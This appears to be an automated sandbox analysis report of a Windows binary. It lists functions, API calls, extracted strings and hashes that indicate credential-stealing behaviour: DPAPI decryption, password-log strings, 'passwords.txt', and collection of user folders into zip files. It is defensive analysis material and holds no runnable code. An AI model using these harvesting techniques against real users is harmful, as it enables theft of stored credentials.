Opcode ID: 2c7759da07163d0620f212d98fc2714713d20de4d2b9561a2e9f2aa4cadc7c34
Instruction ID: 5868344c79461e480f457c81e9a1887bbbfc9f2663a845c77fdb8bd9ba21c61a
Opcode Fuzzy Hash: 2c7759da07163d0620f212d98fc2714713d20de4d2b9561a2e9f2aa4cadc7c34
Instruction Fuzzy Hash: 93E0C231842720A7C6227BAAAB0234D73A07B7AB25F64822FB040215C2CAB80981D65D

Uniqueness

Uniqueness Score: -1.00%

Function 004AB3F6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004A0B78,00000000,?,00000000,00000000,00000000,?,004A4E8F,00000001,00000214,?,?), ref: 004AB439

Part of subcall function 004A284D: __getptd_noexit.LIBCMT ref: 004A284D

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 0ad2d8c7dc44aff3a8b917ed81c8241a9261df5c2c174084947612e321cff378
Instruction ID: a04db9638a1dee0b1ca6a23852cada495cbb4116754694e9136b679fe552be70
Opcode Fuzzy Hash: 0ad2d8c7dc44aff3a8b917ed81c8241a9261df5c2c174084947612e321cff378
Instruction Fuzzy Hash: 1F01B5312016159BEB249F25EC14B673754EBB7761F01863BE8158A2A3DB78C800C698

Uniqueness

Uniqueness Score: -1.00%

Function 00498AE0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06682f03a9d9260599c3e9bd4f1919b332d036b398f894f7b156e68adb775249
Instruction ID: 6f0cb9f37ba81ca47b7e300d3c919b845df81cd92f906857202970f50d09c58f
Opcode Fuzzy Hash: 06682f03a9d9260599c3e9bd4f1919b332d036b398f894f7b156e68adb775249
Instruction Fuzzy Hash: 6DF030F0101240ABDF54CF14C689B577BD4AB62748F6481AEE1044F282CB76D817DB68

Uniqueness

Uniqueness Score: -1.00%

Function 004130A0, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(?,00000000), ref: 004130D3

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: 68d1b6f156d717fe8b664c64203827557463007132c5613207a7f936db7a7c20
Instruction ID: 6b57ad14742c48277dcf7efde6e2e4432b88e2174e8ed7a650ab099214070f68
Opcode Fuzzy Hash: 68d1b6f156d717fe8b664c64203827557463007132c5613207a7f936db7a7c20
Instruction Fuzzy Hash: 80F05E71614300DFEB14EF55D982A5BB7E8EB98300F808C2EF49A87141E739E558CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004A3496, Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__flsbuf.LIBCMT ref: 004A34B7

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __flsbuf
String ID:
API String ID: 2056685748-0
Opcode ID: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction ID: 6ec9b11de6026d1a2fdf99f279a8c3243d591275fcc4cb9a37cef4498416477c
Opcode Fuzzy Hash: b2abbf9e15346c5a683e1eb0b284856c540cceb5b9561b4a404859deff5ecdc1
Instruction Fuzzy Hash: C3E0123000814099DA264E25E4452717BA4AF6772AB38C6CFE594891E3E63E9586DA54

Uniqueness

Uniqueness Score: -1.00%

Function 00403900, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

SHFileOperationA.SHELL32 ref: 0040393B

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4dc6f621c2e5fce55ec6fbad67ce2f3542b3591565184b68cfa5bd339167fdb7
Instruction ID: 3e1e39b8f2c7aed0e11ac81d8090e87450f68906971928e4b61b1ce6291e3849
Opcode Fuzzy Hash: 4dc6f621c2e5fce55ec6fbad67ce2f3542b3591565184b68cfa5bd339167fdb7
Instruction Fuzzy Hash: 2CE05AB09083029FD388DF29D58061ABAE5AF98304F40896EA098C2360E77586588B9B

Uniqueness

Uniqueness Score: -1.00%

Function 00490AB0, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00490AC1

Part of subcall function 00496100: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0049629C

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoIos_base_dtorSystemstd::ios_base::_
String ID:
API String ID: 1980665618-0
Opcode ID: 02b12a4130044cd33dbdc4af19b162ebf1e655e21adeef7fc83922358ebb47da
Instruction ID: 2c68ce11ac87fae07dd5087aea9a8b6b1572c028a2bbcde26149131d50a09f22
Opcode Fuzzy Hash: 02b12a4130044cd33dbdc4af19b162ebf1e655e21adeef7fc83922358ebb47da
Instruction Fuzzy Hash: 9ED012761052106FC604EB55DC85A9BB7ECFF8C215F00851DF98993200D6349A04CF92

Uniqueness

Uniqueness Score: -1.00%

Function 004933F0, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0041750C,00000000,00000000,0000001A,0041750C,?,0000001A,?,?,?,?,0000000F,00000010), ref: 0049340B

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: b13a5c7b7f46961dc9a3fe9816c8ce43927792ae1d34f0e8af8a7d0e70865628
Instruction ID: 2c08649641fb06742f57881e150f195761509758b20f382297821fb41fbe30ed
Opcode Fuzzy Hash: b13a5c7b7f46961dc9a3fe9816c8ce43927792ae1d34f0e8af8a7d0e70865628
Instruction Fuzzy Hash: 1DD0CA71344200AFE2808A64CD46F1A7AA8AB44B00F208418B288CA2D0CAB0A8008B25

Uniqueness

Uniqueness Score: -1.00%

Function 004930C0, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,004135D4,00000000), ref: 004930C5

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 30e659a931854e3cf2d53265c53d4880cebf9ae12826aad2e82055bac1a9d0db
Instruction ID: 556c0bcd7faa231cf070bff32b0aad96b6ea5f67745edc635b50859c87e30269
Opcode Fuzzy Hash: 30e659a931854e3cf2d53265c53d4880cebf9ae12826aad2e82055bac1a9d0db
Instruction Fuzzy Hash: E4C080752012005FDA00C53C490C60775845F71322F408B31F174C11D4C734DC12C11C

Uniqueness

Uniqueness Score: -1.00%

Function 004930F0, Relevance: 1.5, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00407054,00000000), ref: 004930F5

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 676d990260e0bbe8e320e048b50c65d18da74355b1805e36d0754b4836123928
Instruction ID: 3e7077f9fb780e74dc71aedb263c6d694d872cb189d2722106cd0ec71e4e384d
Opcode Fuzzy Hash: 676d990260e0bbe8e320e048b50c65d18da74355b1805e36d0754b4836123928
Instruction Fuzzy Hash: 17C08C791011001BDA009B388C0DA077B88ABA3322F408B32F564C61E0CB38CC56CA1C

Uniqueness

Uniqueness Score: -1.00%

Function 0049D0CC, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 0049D0D9

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction ID: 78a7aa5ebaf350bb80f5f098903fddb396e4973d553966da7323cfc732473532
Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
Instruction Fuzzy Hash: 08C09B7244010C77CF112A43DC02E453F1997C0768F054021FB1C191619577D561D589

Uniqueness

Uniqueness Score: -1.00%

Function 0049E19E, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

__fsopen.LIBCMT ref: 0049E1AB

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __fsopen
String ID:
API String ID: 3646066109-0
Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction ID: edfc18b76fa17980e3aaa9d3a417fef139e536e0b1bcf01b7096fdbd81bf3831
Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
Instruction Fuzzy Hash: C9C0927344020C77CF112E83EC06E4A3F1A9BD4764F148035FB1C191A1EABBEA619689

Uniqueness

Uniqueness Score: -1.00%

Function 00401020, Relevance: 1.3, APIs: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?), ref: 0040102C

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 396f8bccee25d2d13d14cc63dfa2d59370f15b9bfe4d72d010eb27a0a46b619a
Instruction ID: 8d912c681a1cb0d4e3387fadef84e7c30b1c09c81ab5ba7f4830e16c1520b8dd
Opcode Fuzzy Hash: 396f8bccee25d2d13d14cc63dfa2d59370f15b9bfe4d72d010eb27a0a46b619a
Instruction Fuzzy Hash: FE01D4312082868FC710CE2C98C4AA7BBD9DF5A304F04406EF9C4D7222D631D80D8755

Uniqueness

Uniqueness Score: -1.00%

Function 00493010, Relevance: 1.3, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,00000000,?,004197BD,?,?), ref: 0049302B

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 59b9700ef3e8b5141901371d9dac3848c48a87ede5a235684b81a3486f4c7abb
Instruction ID: 82cc5cc05d2940e7cda5256f2fbc3dd45439d5d968fd2a4afce76514e3148513
Opcode Fuzzy Hash: 59b9700ef3e8b5141901371d9dac3848c48a87ede5a235684b81a3486f4c7abb
Instruction Fuzzy Hash: 50E02B763016525787228E6D4848A23EF9DDFDAE12B15413FDA44D731FEA29CE0582A4

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040F150, Relevance: 53.9, APIs: 16, Strings: 14, Instructions: 1371COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040F1B6
_strtok.LIBCMT ref: 0040F2D5
_memmove.LIBCMT ref: 0040F44F
_memmove.LIBCMT ref: 0040F4F8
__wgetenv.LIBCMT ref: 0040F5CC
_memmove.LIBCMT ref: 0040F681
__wgetenv.LIBCMT ref: 0040F70B
_memmove.LIBCMT ref: 0040F7C1

Strings

%DRIVE_REMOVABLE%, xrefs: 0040FE90, 0040FECA
C:\, xrefs: 00410026
%C%, xrefs: 00410003, 00410071
%DRIVE_FIXED%, xrefs: 0040FD1B, 0040FD57
C:\Users\, xrefs: 0040F3F9, 0040F856, 0040FA71
APPDATA, xrefs: 0040F5C3
%LOCALAPPDATA%, xrefs: 0040F6C9, 0040F6F6
\Documents, xrefs: 0040FA83
LOCALAPPDATA, xrefs: 0040F702
.zip, xrefs: 0040FC95
%DOCUMENTS%, xrefs: 0040FA24, 0040FA51
%DESKTOP%, xrefs: 0040F809, 0040F836
%APPDATA%, xrefs: 0040F58A, 0040F5B7
\Desktop, xrefs: 0040F868

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove$__wgetenv_strtok
String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
API String ID: 2886921687-2603015269
Opcode ID: 0fac09c6864896ae0603e0ec4b2c34d2487282c4432ea78b1da1b6e6485cbe22
Instruction ID: c5c6a9cebdb3dcf9c7b1e5a866b1b53ec0f068330fa0c5c4d79c97b60811631e
Opcode Fuzzy Hash: 0fac09c6864896ae0603e0ec4b2c34d2487282c4432ea78b1da1b6e6485cbe22
Instruction Fuzzy Hash: FCC2E3B0900384EFDF20DF68C845BEE7BB5AF15308F14457EE8495B282D7399649CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00416340, Relevance: 7.5, APIs: 5, Instructions: 49encryptionCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0041634A

Part of subcall function 0049E04E: __FF_MSGBANNER.LIBCMT ref: 0049E067
Part of subcall function 0049E04E: __NMSG_WRITE.LIBCMT ref: 0049E06E
Part of subcall function 0049E04E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A0B2E,00000000,00000001,00000000,?,004A75C4,00000018,004CF090,0000000C,004A7654), ref: 0049E093

_memmove.LIBCMT ref: 00416356
_malloc.LIBCMT ref: 00416364
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00416382
_memmove.LIBCMT ref: 0041639B

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _malloc_memmove$AllocateCryptDataHeapUnprotect
String ID:
API String ID: 2315474888-0
Opcode ID: e84ec7c0f421d699e62912f2d83c1617432a702b05fe888ab4ceceffdec1ba89
Instruction ID: 55b456b1d609d108c96d3d53ca0edcb3797dc61457193fa4a3f564db2f42ea8c
Opcode Fuzzy Hash: e84ec7c0f421d699e62912f2d83c1617432a702b05fe888ab4ceceffdec1ba89
Instruction Fuzzy Hash: 77F0D6725046606BD710EB2A9C01E9FBBACFFC5714F48096EF89497201E778D50587EA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A030, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,?), ref: 0041A124
HeapAlloc.KERNEL32(00000000), ref: 0041A12B
_strcpy_s.LIBCMT ref: 0041A16F

Strings

0123456789ABCDEF, xrefs: 0041A06F

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocProcess_strcpy_s
String ID: 0123456789ABCDEF
API String ID: 3271950656-2554083253
Opcode ID: 962320a5cf3f2f742a439471a4f8ef8816986a898bf610699743ecf579d0f154
Instruction ID: ac267854c1fc9c99e19bcafa3cf76682ae8d8206b5d0d7514fde80c64ef619f8
Opcode Fuzzy Hash: 962320a5cf3f2f742a439471a4f8ef8816986a898bf610699743ecf579d0f154
Instruction Fuzzy Hash: E241B2B65083419FC714CF68DD40AABBBE9AB89304F04463EF895C3391EB38D904CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00439000, Relevance: 6.2, APIs: 4, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c349dfdace9eadb24bb2ea765c6a699fb0f8073332f21aa0c36beee43b6b6f8e
Instruction ID: 53b7b2d2b2c4905c2ac0d299d96ab2027dd4ae780ca0f01f4653bb5a38bbd229
Opcode Fuzzy Hash: c349dfdace9eadb24bb2ea765c6a699fb0f8073332f21aa0c36beee43b6b6f8e
Instruction Fuzzy Hash: 9C81CEB190861AAFDB24DF69D88066777E4FB8C314F04066EEC589B701D3B8ED408BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00416190, Relevance: 6.1, APIs: 4, Instructions: 54encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004161AE
LocalAlloc.KERNEL32(00000040,00000000), ref: 004161BD
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004161D1
LocalFree.KERNEL32 ref: 004161E0

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 8ce3861bb27e82753341bfcaaef7f396d2df4b9013f86946c3848e3a6eddcc3b
Instruction ID: c4eec498ec70fd9006891b49f4d1203c566a17d6254c7c9252314e8d8681e4f8
Opcode Fuzzy Hash: 8ce3861bb27e82753341bfcaaef7f396d2df4b9013f86946c3848e3a6eddcc3b
Instruction Fuzzy Hash: 51014F7130121A7BC3105F6ADC44E97FF9CEF563A6B12002AF984D6250DB72E8408B74

Uniqueness

Uniqueness Score: -1.00%

Function 004690E0, Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 665COMMON

Download Yara Rule

Strings

2ab564bf9655b7c7b97ab85cafc8a48329b27f93, xrefs: 00469121, 004696E9, 00469712, 0046978B, 004697DB
database corruption at line %d of [%.10s], xrefs: 0046912B, 004696F3, 0046971C, 00469795

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2ab564bf9655b7c7b97ab85cafc8a48329b27f93$database corruption at line %d of [%.10s]
API String ID: 0-1200375835
Opcode ID: 017bc4ee2d89c2f62d381bc44103b999bf4f233de7011b68f5b7e7f39818411e
Instruction ID: 5f85b8a01b8bb85e37e93c7cfb3ac508dae01cf4171ab927bd37b77263bc842f
Opcode Fuzzy Hash: 017bc4ee2d89c2f62d381bc44103b999bf4f233de7011b68f5b7e7f39818411e
Instruction Fuzzy Hash: C9422371A083518FD714DF29C480A2BBBE5AFC5304F18459EE8858B346E7B9EC46CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00450340, Relevance: 2.7, Strings: 2, Instructions: 185COMMON

Download Yara Rule

Strings

2ab564bf9655b7c7b97ab85cafc8a48329b27f93, xrefs: 00450379, 00450543
database corruption at line %d of [%.10s], xrefs: 00450383, 0045054D

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2ab564bf9655b7c7b97ab85cafc8a48329b27f93$database corruption at line %d of [%.10s]
API String ID: 0-1200375835
Opcode ID: 18b16e369509344f178fa286afbfb576ac288287cbb7ca688a76b71b79e49eaa
Instruction ID: daebedf84d2fb1b9d23db4f895bb1b02627bc43b0f9e6701ff9b3040012682c1
Opcode Fuzzy Hash: 18b16e369509344f178fa286afbfb576ac288287cbb7ca688a76b71b79e49eaa
Instruction Fuzzy Hash: 4651371150C3E14AD3298B2E48A1576FFE2AED2302B8CC69EE8E647793D16CE51CC771

Uniqueness

Uniqueness Score: -1.00%

Function 00464400, Relevance: 1.9, APIs: 1, Instructions: 424COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f70c03fa657d1399bac9f7000f2cb260d0f1b0224cbe1bf4897a2056befb803
Instruction ID: ba0e95409be3eef2c74a2882ce9d4066bcca21928e5fdc4da803bfda4bf8a7d7
Opcode Fuzzy Hash: 0f70c03fa657d1399bac9f7000f2cb260d0f1b0224cbe1bf4897a2056befb803
Instruction Fuzzy Hash: 39E1AD756083419FCB24DF69C880A6BBBE5BBD9304F44892EE88587301E778E855CB97

Uniqueness

Uniqueness Score: -1.00%

Function 00421360, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac94f7eac41c7ba299ea80b4b50479f0a51c57bbc69ec6c4242dca7a4822289
Instruction ID: 00c86eefa15eff5e828de4bd14e489049a3b39abf00b1a0d269254ea938a805c
Opcode Fuzzy Hash: 1ac94f7eac41c7ba299ea80b4b50479f0a51c57bbc69ec6c4242dca7a4822289
Instruction Fuzzy Hash: 984158B2E046324AF30CCF2AA529261EFD3ABD1301349C17BD5AA87655C7708016E7C0

Uniqueness

Uniqueness Score: -1.00%

Function 00421200, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9cc5bbcb968529a2ca602279290d77f02fa66703c1c40be36d5c38abda6847b
Instruction ID: 62c56e9f8b0c068be1013474630b8a2e95005bcff528c1446879b3a6a7c71574
Opcode Fuzzy Hash: e9cc5bbcb968529a2ca602279290d77f02fa66703c1c40be36d5c38abda6847b
Instruction Fuzzy Hash: 5531B392B5A6909DD700D639C801785BB82C7E7128F9CC6BDE0588BFDBD22A940AC795

Uniqueness

Uniqueness Score: -1.00%

Function 0049D0F0, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 321b955498b90130f58826a429d81102f9d33588e07cb83a6734ca6c8551ad8b
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4B115077A0009153DE14CE3DD9B65B7EF95EBD7320B2C437BD0414B758D22AD985D608

Uniqueness

Uniqueness Score: -1.00%

Function 004982C0, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 418356fbf7a41597f6cb58822acaa329cff84b2edbddee9a3604e00bcfe76132
Instruction ID: e7eb43701fe1d378e3c2e4dfa6114a63b42d6e99290750e85edf32d235511e88
Opcode Fuzzy Hash: 418356fbf7a41597f6cb58822acaa329cff84b2edbddee9a3604e00bcfe76132
Instruction Fuzzy Hash: B3219A335798F706D7948B328C04A762BD2CBCA246F6F81F9DE8487252C63ED403E615

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction ID: e062db63554d41186879899b2a29d86d0d446b4106035f511935d59846ebc158
Opcode Fuzzy Hash: 7398b6239bf8858e3d1776f2ebb5b6e80944bbaad592eaf912553e7d93e1029a
Instruction Fuzzy Hash: FEB092606124C04BEB2283248419B0276E1A740B06F8984E0A04582D92C66C8A84A104

Uniqueness

Uniqueness Score: -1.00%

Function 0041A3F0, Relevance: 40.5, APIs: 17, Strings: 6, Instructions: 273libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(007ECA40), ref: 0041A41E
GetProcAddress.KERNEL32(00000000,007ECA88), ref: 0041A441
GetProcAddress.KERNEL32(00000000,007ECB30), ref: 0041A450
GetProcAddress.KERNEL32(00000000,00762EB8), ref: 0041A45E
GetProcAddress.KERNEL32(00000000,007ECAA0), ref: 0041A46D
GetProcAddress.KERNEL32(00000000,007EC920), ref: 0041A47C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A58E
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A5BD
_fprintf.LIBCMT ref: 0041A5CA
WideCharToMultiByte.KERNEL32(00000000,00000000,-00000018,000000FF,?,00000100,00000000,00000000), ref: 0041A5EC
_fprintf.LIBCMT ref: 0041A5FC
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A61E
_fprintf.LIBCMT ref: 0041A62E
_fprintf.LIBCMT ref: 0041A65F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000100,00000000,00000000), ref: 0041A687
_fprintf.LIBCMT ref: 0041A697
FreeLibrary.KERNEL32(00000000), ref: 0041A70A

Strings

Soft: %s, xrefs: 0041A5C4
Password: %s, xrefs: 0041A691
Host: %s, xrefs: 0041A5F6
Login: %s, xrefs: 0041A628
Password: , xrefs: 0041A659
passwords.txt, xrefs: 0041A506

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressByteCharMultiProcWide_fprintf$Library$FreeLoad
String ID: Host: %s$Login: %s$Password: $Password: %s$Soft: %s$passwords.txt
API String ID: 559029228-3130916318
Opcode ID: d21e45b905a37f9ee6980bf839d9f8a767bda9379ce7514cc7b6e29c8f8c9295
Instruction ID: de499d302b1c42955f51cf70c5a66943e161dcc2e2280f533c6a32c02ab64c70
Opcode Fuzzy Hash: d21e45b905a37f9ee6980bf839d9f8a767bda9379ce7514cc7b6e29c8f8c9295
Instruction Fuzzy Hash: B491CEB1605200AFD710DF64DCC5DABB7EDEB98704F044A2FF18692291D778A984CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00404660, Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 305COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004046A2
std::_Xinvalid_argument.LIBCPMT ref: 004046C0
_memmove.LIBCMT ref: 0040472D
_memmove.LIBCMT ref: 0040475F
std::_Xinvalid_argument.LIBCPMT ref: 004047D3
std::_Xinvalid_argument.LIBCPMT ref: 00404848
std::_Xinvalid_argument.LIBCPMT ref: 00404860
std::_Xinvalid_argument.LIBCPMT ref: 0040487A
_memmove.LIBCMT ref: 004048E4
_memmove.LIBCMT ref: 00404901

Strings

invalid string position, xrefs: 004047CE, 00404843
string too long, xrefs: 0040469D, 004046BB, 0040485B, 00404875

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 2168136238-4289949731
Opcode ID: e210848108e13fb6bc44c4a4efedad8cbe13334f3d51bcf6e513c6863404fb7c
Instruction ID: 624e38b0dce2cd2fdf7bbce591bc919b4c01a7962ea774963b332ee451eed2f5
Opcode Fuzzy Hash: e210848108e13fb6bc44c4a4efedad8cbe13334f3d51bcf6e513c6863404fb7c
Instruction Fuzzy Hash: A491B4B63002409BD724DE1DE98096AB3E6EBD2714B204E3FF192E76C1D778DC4587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00417390, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 004173A2
LoadLibraryA.KERNEL32(00763558,007E2F18,?,?,?,?,0000000F,00000010), ref: 004173E0
GetProcAddress.KERNEL32(00000000,007ED220), ref: 004173FD
GetProcAddress.KERNEL32(00000000,007ECFF8), ref: 00417411
GetProcAddress.KERNEL32(00000000,007632D8), ref: 00417426
GetProcAddress.KERNEL32(00000000,007ED280), ref: 0041743A
GetProcAddress.KERNEL32(00000000,00763578), ref: 0041744E
GetProcAddress.KERNEL32(00000000,007ED250), ref: 00417463

Part of subcall function 0049EAAB: __lock.LIBCMT ref: 0049EAB9
Part of subcall function 0049EAAB: __putenv_helper.LIBCMT ref: 0049EAC8

Strings

x5v, xrefs: 0041743C
PATH=, xrefs: 004173C1
X5v, xrefs: 004173DA
PATH, xrefs: 0041739D

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoad__lock__putenv_helper__wgetenv
